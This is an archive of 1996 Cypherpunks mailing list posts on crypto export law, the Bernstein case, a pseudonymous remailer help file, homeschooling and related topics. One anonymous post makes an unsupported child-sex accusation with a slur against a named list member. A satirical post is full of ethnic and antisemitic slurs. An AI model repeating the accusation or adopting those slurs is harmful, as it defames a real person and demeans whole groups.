D6 64 B3 00 04 74 FD A7 12 C9 = fingerprint PGP-encrypted mail welcome! "640k ought to be enough for everybody." From jimbell at pacifier.com Mon Sep 23 01:53:34 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 23 Sep 1996 16:53:34 +0800 Subject: Bernstein hearing: The Press Release Message-ID: <199609230537.WAA15530@mail.pacifier.com> At 05:15 PM 9/22/96 -0700, Rich Burroughs wrote: >At 04:39 PM 9/21/96 -0800, Jim Bell wrote: >>At 02:03 PM 9/18/96 -0700, John Gilmore wrote: > >[snip] >>>* Any legal framework that allows a government bureaucrat to >>>censor speech before it happens is an unconstitutional prior restraint. >>>The government is not allowed to set up such a drastic scheme >>>unless they can prove that publication of such information will >>>"surely result in direct, immediate, and irreparable damage to our >>>Nation or its people" and that the regulation at issue is necessary >>>to prevent this damage. >> >>At the risk of being a devil's advocate, let me suggest that you are >>conceding too much even with the preceding paragraph. The 1st amendment >>says nothing about preventing speech which (even admittedly) would result >>in "direct, immediate, and irreparable damage to our nation or its people." >[snip] > >Jim, that's a quote of Potter Stewart from the Pentagon Papers case, if I'm >not mistaken. It's not written in the Constitution, but Supreme Court >precedent is the next best thing as far as con law goes. Under the circumstances, I think it would be wise to actually EXPAND our protections. A lot has happened in the last 25 years. If a reasonably extensive list were made of situations and circumstances where the wool was pulled over the eyes of Americans by government...and how subsequent developments showed that these things were best revealed THEN and not later...it could be reasonably argued that there is no or almost no area where the "direct, immediate, and irreparable damage" exception is likely to realistically exist. You should point out that the Pentagon Papers case was decided notwithstanding an extraordinarily generous set of assumptions common in Cold-War America about the power and authority of government, many if not most of which would be no longer considered valid. Put the opposition on the spot: Insist that they provide a substantial number of examples where speech was expected, was attempted to be restricted by gov't under such an exception, where that speech actually occurred (either by refusal of the court to intervene or by refusal of a party to the case to restrict his speech), and show how this actually caused any "direct, immediate, and irreparable damage." In the absense of such examples, it is reasonable to presume that, generally, they don't exist or are so rare as to be ignorable. (For example, in the Progressive case from the middle 70's, the gov't dropped its case. What harm occurred?) >The government can restrict speech in time, place or manner, according to >the courts. Restricting content is more difficult, and places a much >heavier burden on the gov. > >To expect people writing about and arguing the case to completely ignore >the existing case law is foolish, IMHO. I am _not_ suggesting that case law be "ignored." Rather, point out that the case law, even though it goes in your favor, was still decided in a thoroughly biased atmosphere and therefore further reductions in government authority are appropriate. Jim Bell jimbell at pacifier.com From wombat at mcfeely.bsfs.org Mon Sep 23 01:54:06 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Mon, 23 Sep 1996 16:54:06 +0800 Subject: Internet File System? In-Reply-To: <960922232858_108284943@emout01.mail.aol.com> Message-ID: On Sun, 22 Sep 1996 Scottauge at aol.com wrote: > There is something in the UNIX world called NFS (network file system). It is > based on TCP/IP sockets. > > I do not know if you know anything about UNIX, but the file system used does > not have logical drives (like a: or b: etc), just one huge tree that can span > across many harddrives on many computers, thus making them all look like one. > NFS helps to connect the other computer's file systems to the network tree. > > I think it is pretty cool... Yeah, real secure too. ;) ;) ;) - r.w. From gnu at toad.com Mon Sep 23 01:56:08 1996 From: gnu at toad.com (John Gilmore) Date: Mon, 23 Sep 1996 16:56:08 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <199609212340.QAA07773@mail.pacifier.com> Message-ID: <199609230544.WAA08826@toad.com> The EFF press release on the Bernstein hearing said: > >* Any legal framework that allows a government bureaucrat to > >censor speech before it happens is an unconstitutional prior restraint. > >The government is not allowed to set up such a drastic scheme > >unless they can prove that publication of such information will > >"surely result in direct, immediate, and irreparable damage to our > >Nation or its people" and that the regulation at issue is necessary > >to prevent this damage. Jim Bell said: > At the risk of being a devil's advocate, let me suggest that you are > conceding too much even with the preceding paragraph. The 1st amendment > .... [long discussion] .... The wording there is taken directly from the controlling Supreme Court case, which I believe is the Pentagon Papers case. The example used in that case was the departure date and route of a ship carrying US troops to war. The government could sue people who threatened to publish such information, prior to publication, and have some chance of winning the case. It's not a guarantee, just a pre-qualification. The idea is that if they CAN'T show such a danger, they have NO chance of winning. The Supreme Court didn't even say that publishing the sailing dates of troop transports *could* be prior-restrained. What they said was that they would consider such a case if it ever got to them. Cases which didn't meet such a high standard should just be taken care of by the lower courts. We aren't conceding anything. We're pointing out that the export control law doesn't even meet the standard that the supreme court has already set for laws like this. You might want to hold the government to a higher standard than the threshold they set in the Pentagon Papers case. Myself, I think they did an excellent job, especially considering that it was wartime and that the document the New York Times wanted to publish was classified but had been leaked. They didn't permit the government to prior-restrain publication of it ANYWAY. The "direct, immediate and irreperable damage" phrase was them merely trying to think up a hypothetical document that they MIGHT allow prior restraint to apply to. My opinion on criminal and civil law is quite different from the Supreme Court's. Still, I am working on having the Supreme Court confirm my opinion in a particular area -- that of the crypto export control laws. I'd rather bring them a nice simple case that focuses on just one thing. It's a lot easier for them to decide about the thing I really care about, if it doesn't bring in extraneous factors like exactly where the line should be for permitting prior restraint. The Supreme Court would ignore the prior restraint line issue anyway, because it isn't a factor in this case. The government isn't arguing that they have the right to prior-restrain us because of direct, immediate and irreperable damage. Instead they argue that the publication itself is being controlled only for its function, not for the content of the publication, and therefore in controlling the function, they can "incidentally" control the publication. And if they can legitimately control the speech, then what's all this fuss about prior restraint when it's punishable speech anyway? This is the set of issues that the Supreme Court would tend to look at. John PS: I'm not a lawyer, and I didn't ask a lawyer to read this over, so I might have some parts wrong. From matt at lust.bio.uts.edu.au Mon Sep 23 02:05:58 1996 From: matt at lust.bio.uts.edu.au (Matthew Gream) Date: Mon, 23 Sep 1996 17:05:58 +0800 Subject: (Fwd) Australian "ITAR" regulations In-Reply-To: <199609230132.LAA08960@rosella.osa.com.au> Message-ID: <199609230619.QAA16932@lust.bio.uts.edu.au> Hi there, > An anonymous opinion from inside the Defence Dept holds that electronic > bits on a wire do not constitute goods, and as a result if you ship > electronically, you are not subject to the regulations. If you ship a > CD or floppy or other physical media containing software, you violate the > regulations. Watch out for those anonymous opinions; I received exactly the opposite opinion when I spoke to the Defence Signals Directorate about the issue (back in 1994) -- after specifically asking about a few hypothetical cases. Of course, either opinion may be correct, which is the real problem! > I'll add this to the SSLeay legality FAQ - standard disclaimers apply > of course, obtain professional legal advice before exporting SSLeay. Definitely ... what a pain, however :-(. Best of luck! Matthew. -- Matthew Gream -- matt at lust.bio.uts.edu.au. From wmono at direct.ca Mon Sep 23 02:06:41 1996 From: wmono at direct.ca (William Ono) Date: Mon, 23 Sep 1996 17:06:41 +0800 Subject: Jena Remailer In-Reply-To: <199609221720.KAA15948@sirius.infonex.com> Message-ID: On Sun, 22 Sep 1996, Mixmaster wrote: > The trickiest thing about it - by far - is the inscrutable English > translation of the helpfile. I have been trying for over a week to make [...] > Can any native English speaker please paraphrase the account start-up > procedure for us? I took a stab at re-writing the help file, and I've attached it below. The operator of jena might want to use it instead of the help file currently being distributed, after correcting any errors and adding the German sections back in. IMHO, the How do I.. section is the most useful. I believe these instructions are correct -- I was able to follow them to create a nym, and use it. YMMV. -- William Ono PGP Key: F3F716BD fingerprint = A8 0D B9 0F 40 A7 D6 64 B3 00 04 74 FD A7 12 C9 = fingerprint PGP-encrypted mail welcome! "640k ought to be enough for everybody." Pseudonymous Server Help ~~~~~~~~~~~~~~~~~~~~~~~~ This pseudonymous server allows private, pseudonymous communication. When used with chained remailers, true pseudonymity without fear of a connection to a real address can be achieved. Some things to remember about this server: - When creating a pseudonym, a special PGP key created for this purpose is sent to the server. This will be used to name the pseudonym, and assign a Email address. * The hexadecimal key-ID forms the Email address. For example, if the nym's key is 0x01020304, the address will be: anon-01020304 at as-node.jena.thur.de * The user-ID of the key contains the pseudonym, only. Note: This is different from the convention, which is to include the Email address in angle brackets. - To publish something under a pseudonym, send a encrypted, signed email to this server, which will post it to one or more Usenet newsgroups, or send it via Email. - Anyone is able to reply to items published under a pseudonym. Anything sent to the pseudonym's Email address is stored on the server, encrypted with the pseudonym's public key. - Because the server does not know (and does not want to know) the true identity behind a pseudonym, mail cannot be delivered directly. - Mail is delivered only when a signed, encrypted request is received from a nym. At this time, all waiting mail is sent to the address specified in the encrypted message. - The server never answers. If something goes wrong, the job will be dropped silently. All commands are sent in the Subject: header of the unencrypted (plaintext) message, and should be Emailed to anon at as-node.jena.thur.de There are two commands: help - sends the server's help file. send - delivers waiting mail. The body of the Email should be a signed, encrypted message with a Reply-To: header, which is where the mail will be delivered via Mixmaster remailers. (The key that the body is signed with determines which nym's mail is delivered.) The nym's mail spool is then purged. To prevent replay attacks, the signature must be less than 48 hours old. If the signature is not valid, the request is bounced and the headers are saved, encrypted, in the nym's mail spool. If no valid command is found in the Subject: header, the body is checked for a signed, encrypted (to the server) message. If the signature is from a keyID belonging to an existing nym, and the check fails, the headers are saved, encrypted, in the nym's mailspool. This is to alert the owner of the nym to a possible spoof attempt. If the signature check fails because the keyID that the signature is from is unknown, the decrypted body is assumed to contain a public key for a new nym, which will be added to the server's database. If the signature is valid, the decrypted body should be a header for the outbound mail, followed by a blank line, then the body for the outbound mail. The following are headers considered valid by the server: * Subject: (or Anon-Subject:) * To: (or Anon-To:) * References: * Newsgroups: (or Post-To: or Anon-Post-To:) * Followup-To: (or Anon-Followup-To:) - This must be specified as a -single- newsgroup if cross-posting All outbound messages has Precedence: junk to silently drop error messages. If any of the above conditions are not met, the server will silently drop the job. This server must not be used to transmit illegal materials, flames, or binary data. I may disable nyms that misuse the server. The German telecommunication laws may require me to modify the server to allow access to intelligence agencies without notification. You are advised to use Mixmaster remailers and other alias servers -- it is recommended that you do not request mail to be sent to your own Email address. How do I .. ~~~~~~~~~~~ ..create an identity? - Run 'pgp -kg' to generate a new key. + Select your keysize. (a 1204-bit or larger key is recommented) + Enter your pseudonym as the user-ID. Do not enter an Email address. + Enter a passphrase. (Make sure not to forget it!) - Run 'pgp -kxa "pseudonym" > anonid.asc' to extract your public key. - Run 'pgp -esa -u "pseudonym" anon at as-node anonid.asc' to sign and encrypt the extracted key for the server. - Mail the result to anon at as-node.jena.thur.de with a Subject: header that does not include the words 'help' or 'send' (It is recommened that you do this through one or more anonymous remailers.) - Test your nym by posting to a test group (de.test is recommended due to the location of the server) and wait several days before requesting mail delivery. - If it didn't work, repeat the entire procedure. It's possible that the key-ID already exists in the server's database and belongs to another pseudonym. ..Email a message? - Write the mail body, remembering not to include any information about your true identity. - Add the following headers at the top of the mail: To: destination at of.mail Subject: Outbound mail's subject line Leave a blank line between the headers and the body. - Save the file. - Run 'pgp -esa -u "pseudonym" anon at as-node filename' to sign the mail with the nym's key, and encrypt it for the server. - Mail the result to anon at as-node.jena.thur.de with a Subject: header that does not include the words 'help' or 'send' (It is recommened that you do this through one or more anonymous remailers.) ..post an article? - Write the article's body, remembering not to include any information about your true identity. - Add the following headers at the top of the mail: Newsgroups: a.newsgroup.name Subject: Article's subject line (If cross-posting, remember that a Followup-To: header is required.) Leave a blank line between the headers and the body. - Save the file. - Run 'pgp -esa -u "pseudonym" anon at as-node filename' to sign the mail with the nym's key, and encrypt it for the server. - Mail the result to anon at as-node.jena.thur.de with a Subject: header that does not include the words 'help' or 'send' (It is recommened that you do this through one or more anonymous remailers.) ..request Email to be delivered? - Create a file containing the following: Reply-To: address at for.delivery Leave a blank line after the header. - Save the file. - Run 'pgp -esa -u "pseudonym" anon at as-node filename' to sign the mail with the nym's key, and encrypt it for the server. - Mail the result to anon at as-node.jena.thur.de with a Subject: header that does not include the words 'help' or 'send' (It is recommened that you do this through one or more anonymous remailers.) Things to remember ~~~~~~~~~~~~~~~~~~ - Never send mail directly to the server. Always use at least one remailer to hide your identity. The best way to protect yourself against a police 'request' is to ensure that the server cannot determine your identity. - Use Mixmaster remailers for increased protection. Use mixmaster at as-node.jena.thur.de as the final hop to defeat traffic analysis. - Never request a delivery to your real Email address. Typ Bits/ID Datum Benutzer Type bits/keyID Date User ID �ff 1024/D3305539 1996/05/01 Jenaer Anonymous Service -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQCNAzGHxbMAAAEEALWo6oH8J48d1QhSrkbQCt/PZorS5o/9vEQ0DC2UHxivY98i AcYnq2Dxv3mQYFxcA4Zl5kAGoZCwUadlubLYPeXP2dpZlcjlI87IBsOK37B3+dQL 9ax0biK8SILNopepwReJTywwNhAoeu2DNqMJDOjocrRTTJCP+0oZs23TMFU5AAUR tDRKZW5hZXIgQW5vbnltb3VzIFNlcnZpY2UgPGFub25AYXMtbm9kZS5qZW5hLnRo dXIuZGU+iQEVAwUQMYfTDAnccDk5839dAQGy7wgAp23a76rW1QU9Sc+HyLBzrEnE usBFQrCDozcO1K9pOE+NYQcQwArnNHpm3+wF/afAsPLsNyD84Cm4vVba7QeAWUx1 un0HFHE840wS9g0S+FUUjoPW/foNVcGFN5RcUJWVSvXSNfihz6JwuuyFZWuZNUdD RA4ta1V9uMM/x+lVmlYQ7PvkBbZXSQS1gkBQAZyxFNx0OOtqxcsLHxJ05FJrniDu r0VRZzkqI1qyUFBlYkd4nx7xA8QraDH7nPWMisiXtxNzuDBW+Cnkdh1xOneS1gzE 7Ssm9r5ktSV+ZQqmk6sh0qeFsWtGQLG6TJBDjb9uNS18dkkru0svZNcrGY+EL4kA lQMFEDGHxbNKGbNt0zBVOQEB5aQEAInk+hdiDVyXnuIKsMgXPfxVJtmzqblvmGTV gRr+7kDlC+Y6ZK1qbeI+uDNJsDGmLkP7Uez+7IwFASrr+bc4ZCbkQK5FZIJvlXLs gkYbvuIzpppR4RfkEpeawehw0ZNuXXpxI6K9P1DabXI+OdVaNG7Lj0Qr5Iac7Vz2 056eXiNH =6tO4 -----END PGP PUBLIC KEY BLOCK----- Jenaer Mixmaster Anonserver =-=-=-=-=-=-=-=-=-=-=-= jenanon mixmaster at as-node.jena.thur.de 54e0023828fabe0b85e83b3d458134e3 2.0.3 -----Begin Mix Key----- 54e0023828fabe0b85e83b3d458134e3 258 AASVur47+5caGetEAZJKG/s5uEjXZb+1epW5UWV1 a4Tt/osQKS+c5gxnArSwDyXHsnt9MxDznhRAR73D CT+2a/NC494VAV4MoWGAZI0NZtw8brvzZza/9qp9 V3tlbaIjnPVhGqlPFG6lyTi1BLCJGqMUQZMQWLt5 8Q2AGklC/SYg6QAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB -----End Mix Key----- From snow at smoke.suba.com Mon Sep 23 02:09:00 1996 From: snow at smoke.suba.com (snow) Date: Mon, 23 Sep 1996 17:09:00 +0800 Subject: Informal Renegotiation of the Law In-Reply-To: <19960918160153703.AAC88@IO-ONLINE.COM> Message-ID: <199609230243.VAA00509@smoke.suba.com> Mr. Adams wrote: > On Sun, 15 Sep 1996 17:54:49 -0500 (CDT), snow wrote: >>> For example, you will not read anywhere that compulsory education laws have >>> rare. Compulsory education has been effectively repealed by the actions of >>> refusenicks in both the subject population and the enforcement population. >> Their children are still getting educated. Not thoroughly enough in >>some cases, but educated in the basics. >It has always seemed somewhat amusing that we will have a) a widespread opinion >that homeschooling is of lesser value and b) numerous studies, surveys, >testimonials, reports, etc, that show what a rotten job public education is >doing*. This raises the question of how anyone even remotely concerned with >their children's welfare could do worse. . . Yet another unexplained mass >insanity. I would agree that parents can do as good or better at _most_ subjects thru about the 3rd or 4th grade, and I do agree that most of todays schools are shit, however there is one area--social skills--that homeschooling simply can't compete. Children need to learn how to interact with one another in groups larger than a family unit. I don't think that homeschooling can accomplish this nearly as well as the public (or private) schools could. I also don't think this is as important as, say Math, Science, or English. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From dustman at athensnet.com Mon Sep 23 02:38:19 1996 From: dustman at athensnet.com (Dustbin Freedom Remailer) Date: Mon, 23 Sep 1996 17:38:19 +0800 Subject: A daily word of caution in reference Tim C[unt] May Message-ID: <199609230540.BAA16639@godzilla.athensnet.com> Tim C[unt] May is not only as queer as a three dollar bill, but he is also into having sex with children. From tcmay at got.net Mon Sep 23 02:43:55 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 17:43:55 +0800 Subject: Snake-Oil FAQ Message-ID: At 1:41 AM 9/23/96, steven ryan wrote: >At 05:27 AM 9/22/96 -0700, you wrote: >>My view is that people interested in buying and using crypto are either >>bright enough to learn, or are not. A "Snake Oil FAQ" is largely >>unnecessary, for either category. For the first, because they're bright. >>For the second, because they're not. > >My view is that there is a large third group of people who are bright >enough to learn, but don't have the time or inclination to read books or do >extensive research on the subject. There are a lot of people using PGP for >the wrong reason, not because they read the books or did the research. Nor >do they even understand how it works as opposed to how it is used. They are >using it because they cruised the net and read good things about it or >heard it was cool. Well, there are a bunch of books out on PGP, which they can read. And there are already some good FAQs out on the basics of cryptography--surely concise enough and yet detailed enough to warn folks away from some basically flawed programs. But just how far can one go? Some people just won't be taught, despite the several very-accessible books on PGP and crypto. So? And I don't really think there's a problem. Just how many of these "Snake Oil" crypto programs are people really _buying_? And does it matter if they buy a reasonably-competent program (*) like "DiskLock" instead of using 3DES or one of the good disk encryption programs? (* By "reasonably competent" I mean not "snake oil," and roughly able to do the job for which it was intended. Many people just want casual-grade crypto, to stop casual attempts to look at what they've written. We may disagree with them, but, hey, it's their choice. I maintain that these people are unlikely to read something called "The Snake Oil FAQ.") To coin a phrase, you can lead a person to strong crypto, but you can't make him drink. >A Snake Oil Faq could help prevent these people from choosing wrong >products. It would also be very helpful to have all the arguments in one >place in one concise faq. Before I joined this list and read Applied At some point this become YACB (Yet Another Crypto Book). If you and others want to donate time to help educate the (small, I think) class of users who won't read the PGP books, or the PGP articles in the magazines, and yet who you think are smart enough...blah blah...well, go ahead and write such a thing. (BTW, Schneier has a book out on "Security for the Macintosh," a kind of watered-down intro to crypto and security....he makes the points a "Snake Oil FAQ" might make...again, I think this is an overcrowded market.) >Cryptography I was in a discussion in a previous job about securing one of >our products. The programmer wanted to protect the key with a convoluted >series of transpositions. I knew it was dumb but couldn't successfully >argue the point why. A faq would have been helpful. Wouldn't arguments out of the standard textbooks have been just as effective, and perhaps even more "credentialled" than words from a FAQ? I hope you are not expecting that a FAQ would have the precise magic words dealing with your programmer friend's situation? At best, it would contain seom reworded arguments out of the well-known textbooks. I just don't see the point. But if it keeps folks busy, and happy, I guess it's harmless. (:-}) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From shamrock at netcom.com Mon Sep 23 02:55:32 1996 From: shamrock at netcom.com (Lucky Green) Date: Mon, 23 Sep 1996 17:55:32 +0800 Subject: Informal Renegotiation of the Law In-Reply-To: <199609230243.VAA00509@smoke.suba.com> Message-ID: On Sun, 22 Sep 1996, snow wrote: > I would agree that parents can do as good or better at _most_ subjects > thru about the 3rd or 4th grade, and I do agree that most of todays schools > are shit, however there is one area--social skills--that homeschooling > simply can't compete. Children need to learn how to interact with one another > in groups larger than a family unit. I don't think that homeschooling can > accomplish this nearly as well as the public (or private) schools could. I understand that many parents that homeschool belong to organizations that provide for meetings twice a week in which the children so educated in a certain area get together. Homeschooling does not have to stand in the way of a normal socialization process. --Lucky From rp at rpini.com Mon Sep 23 02:58:40 1996 From: rp at rpini.com (Remo Pini) Date: Mon, 23 Sep 1996 17:58:40 +0800 Subject: Where to write crypto? Message-ID: <9609230633.AA18985@srzts100.alcatel.ch> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Mon Sep 23 08:31:11 1996 > > > On Sat, 21 Sep 1996, Dan McGuirk wrote: > > If I want to go to a country outside the United States to write > cryptographic code that will be freely distributable, what's the > best place to go? Switzerland has NO crypto laws (yet)... - ------< fate favors the prepared mind >------ Remo Pini rp at rpini.com PGP: http://www.rpini.com/crypto/crypto.html - ----< words are what reality is made of >---- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQEVAwUBMkYusBFhy5sz+bTpAQHziQf/eGRk90lC1/0NNMj9Qco54BHZhElwPCnK CsH8UJr90Ue68K5GA5VSBcWrBw/7j/AxaM5RiwnNzeuyw1GwYWlSKyfKzczqU6Z/ 2DuCGz/cRkDuUYjK5PrWbh59Pr6PH8flqnFEap9cWU1Fl8BjdCBX+6IYTjVh1Ph4 Z6M7kYB3rDlTYECB8CtZhAELq89+nD4Rk1SI/lIckGNOS/tSESBQ+5L/t+JDFmUd e6w07eRchN22+XDkVxBJ6UNPGR+3IiaNduOMXDyAgsHetXkfN51TaGOSpTlJltOz Wd7K0vjhGPDNhSgAa9dQ5J3B8ckHGsELHloXvjYfzfzW/tDOtbdjmg== =Whww -----END PGP SIGNATURE----- From tcmay at got.net Mon Sep 23 03:04:44 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 18:04:44 +0800 Subject: Public Schools Message-ID: At 4:31 AM 9/23/96, Lucky Green wrote: >On Sun, 22 Sep 1996, snow wrote: >> I would agree that parents can do as good or better at _most_ subjects >> thru about the 3rd or 4th grade, and I do agree that most of todays schools >> are shit, however there is one area--social skills--that homeschooling >> simply can't compete. Children need to learn how to interact with one another >> in groups larger than a family unit. I don't think that homeschooling can >> accomplish this nearly as well as the public (or private) schools could. > >I understand that many parents that homeschool belong to organizations >that provide for meetings twice a week in which the children so educated >in a certain area get together. Homeschooling does not have to stand in >the way of a normal socialization process. Also--and I mean this point completely seriously!--many parents are not altogether convinced that the "public school socialization" is all that beneficial. Do kids really _need_ to learn to wear gang colors, smoke to be cool, get pregnant at age 14, and so on? An awful lot of accomplished persons grew up in isolated areas, on small farms, and were educated in very small classrooms (or at home). I think the "social skills" Snow talks about above are actually the _worst_ part of public schools in fin-de-Siecle America. If I had a kid, I wouldn't want him or her in the local public schools. (And my area is more remote than over in San Jose--San Francisco, which is even worse. And LA is even worse.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From mccoy at communities.com Mon Sep 23 03:27:12 1996 From: mccoy at communities.com (Jim McCoy) Date: Mon, 23 Sep 1996 18:27:12 +0800 Subject: Evolving algorithm for faster brute force key searches? In-Reply-To: Message-ID: Adam Shostack [...] > Weak systems are thus useful for research and training >purposes. I suspect Tim is on the money with a genetic algorithim >having a flat `fitness landscape,' but there may be something that a >human misses which an evolved algorithim finds. > > Also, it may be possible to evolve something against a >reduced round version of a cipher (using a training space that is not >flat) that will still work better than brute force against a full >system. If you have cycles to spare, it might be an interesting >avenue of research. While a well-designed algorithm has a flat search space in the case of a single instance of a particular ciphertext/plaintext, this is not necessarily the case for repeated encryptions using the same key and possibly for other examples (hence differential cryptanalysis, etc.) If there is a way to break a system that is less than a brute-force search of all possible keys then the landscape is not flat. The hard part with making such discoveries using evolutionary methods is that even if the landscape is not completely flat the positive and negative reinforcement needed to perform selection in such an environment almost always necessitates that the fitness function be crafted with this in mind by the researcher and few evolutionary programming researchers know anything about crypto. While there are a few strikes against such research (as the oft repeated "flat landscape" phrase shows) I would not let the current state of the art in this area disuade anyone interested. Most of the research done so far has been done by people who either knew little about crypto or little about evolutionary programming. There are also other areas of crypto relevance which may prove more amenable to evolutionary programming methods, like factoring... jim From mccoy at communities.com Mon Sep 23 03:35:47 1996 From: mccoy at communities.com (Jim McCoy) Date: Mon, 23 Sep 1996 18:35:47 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: Brian Davis [...] >Constitutional literalists take note: the First Amendment says nothing >about what the executive branch or the states can do .... The states are prohibited through the 14th Amendment via the Slaughterhouse cases, the ability of the executive branch to violate due process is questionable (from a legal viewpoint, not a practical one...the President cannot order you placed in jail unless you have broken a law which requires congress to have made the law in the first place...) jim From bdavis at thepoint.net Mon Sep 23 03:42:39 1996 From: bdavis at thepoint.net (Brian Davis) Date: Mon, 23 Sep 1996 18:42:39 +0800 Subject: Mercenaries In-Reply-To: Message-ID: On Wed, 18 Sep 1996, Timothy C. May wrote: > At 9:40 PM 9/17/96, William Knowles wrote: > > >What about the French Foreign Legion? or the Volunteers for Israel, > >which isn't really a fighting force, but Americans can help keep > >the Israeli army at a ready state. > > Israel is one of several states which the U.S. allows dual citizenship > with. For political reasons, because of America's extermination of the Jews > in WW II (Whoops, we were on the other side...so why do we have such a cozy > deal with Israel, but not with, say, France? Beats me. Politics.) > > Brian Davis, our former Prosecutor, can tell us how likely it is that any > person would be charged and brought to trial for being a paid mercenary for > some small country in the Third World. The CIA is often behind such > mercenaries, so national security issues could make the issue murky. Exceedingly unlikely. A variety of practical problems. If you came up to a U.S. Attorney to show him your picture on the cover of The Zaire Daily News as mercenary of the week and spit in his face, you'd get prosecuted. For spitting in the prosecutor's face. On a slightly more serious note: you'd only get prosecuted in someone at Main Justice (i.e. in Washington) wanted you prosecuted. EBD > > But the real reason such prosecutions are rare is that the government > realizes how Orwellian it sounds to say: > > "You are being prosecuted because you were a mercenary for Oceania in its > war with Eastasia. While Oceania was once our ally in our battle with > Eastasia, and we endorsed and financed your role as a mercenary, we became > allies with our great friend Eastasia and are now in a state of war with > the tyrants of Oceania." > > > >Explicit isn't a dirty word, Or is it? > > AOL has declared "explicit" to be a Banned Word, along with "pissant," > "craps," and "cock," and numerous other such ordinary words. (So much for > mentioning their pissant policies, a game of craps in Las Vegas, or a male > chicken.) > > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > > From tcmay at got.net Mon Sep 23 04:04:16 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 19:04:16 +0800 Subject: Kicking the Furriners out of our Classrooms Message-ID: At 6:19 AM 9/23/96, Matthew Gream wrote: >Hi there, > >> An anonymous opinion from inside the Defence Dept holds that electronic >> bits on a wire do not constitute goods, and as a result if you ship >> electronically, you are not subject to the regulations. If you ship a >> CD or floppy or other physical media containing software, you violate the >> regulations. > >Watch out for those anonymous opinions; I received exactly the opposite >opinion when I spoke to the Defence Signals Directorate about the issue >(back in 1994) -- after specifically asking about a few hypothetical >cases. Of course, either opinion may be correct, which is the real >problem! Cindy Cohn made the excellent point at the Bernstein hearing that the ITARS are so vague and overbroad that a professor cannot be sure if his lecture is violating the law because foreigners are in the audience (a la the Junger case). As she notes, nearly all college and postgraduate classes are heavily populated by non-U.S. citizens, and the ITARs specifically make illegal the propagation of certain items to non-U.S. citizens. (There is no exemption in the ITARs for university professors teaching their classes. If foreigners are in the classroom, and cryptographic or weapons-related knowledge is imparted, an ITAR violation has probably occurred.) Personally, I'd relish the opportunity to say to my class: "Now, the International Trafficking in Arms Regulations, the ITARs, make it a felony for me to disclose certain methods or techniques to non-U.S. citizens. Accordingly, in this class, I must insist that all non-U.S. citizens, or suspected Israelis, ragheads, Papists, or Marxists, illegal Mexicans, etc., leave the lecture hall immediately. All those remaining must present at least five forms of identification, dating back at least to 1978. Foreign-looking persons should provide at least seven forms of identification, including documentation that they are not in the U.S. illegally. Jew-looking or Jew-sounding names will be subjected to special scrutiny to ensure that they are not dual-citizens with the ITAR-restricted Zionist Entity. "Oh, and since classroom participation counts for 65% of your grade, those I exclude under the ITAR restrictions had better score 155% on the exams I let you into the classroom to take, else you'll flunk. Good luck, you fucking foreigners!" (Cindy Cohn pointed out to the court that their might also be 14th Amendment problems with enforcement of the ITARs with regard to teaching in universities.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From geoffk at discus.anu.edu.au Mon Sep 23 04:24:47 1996 From: geoffk at discus.anu.edu.au (Geoffrey KEATING) Date: Mon, 23 Sep 1996 19:24:47 +0800 Subject: Macintosh Mixmaster port... Who's doing it? In-Reply-To: <3.0b19.32.19960922162606.006c1644@ricochet.net> Message-ID: <199609230818.SAA00330@discus.anu.edu.au> > Date: Sun, 22 Sep 1996 16:26:11 -0700 > From: Greg Broiles > At 03:16 PM 9/22/96 -0500, Adam Shostack wrote: ... > I'm pottering around with a Java-based remailer that acts like a POP client > so it can run on a client machine, not a Unix box; but other people should > take that as a challenge to see if they can finish one before/better than > me, not a reason to avoid writing one. Hal Finney has already done some > very nice work with Java and mailing; see his home page (the address of > which I don't have immediately at hand) for more details. Hal is at http://www.portal.com/~hfinney/ . I have a prototype PGP-encryption implementation in Java, which I was intending to build into a remailer _client_ (I think remailers themselves will be better written in C for performance reasons, or at least the crypto portions); at first, for 'type I' remailers, then perhaps for mixmaster. The prototype, which just encrypts to a public key, has been put at 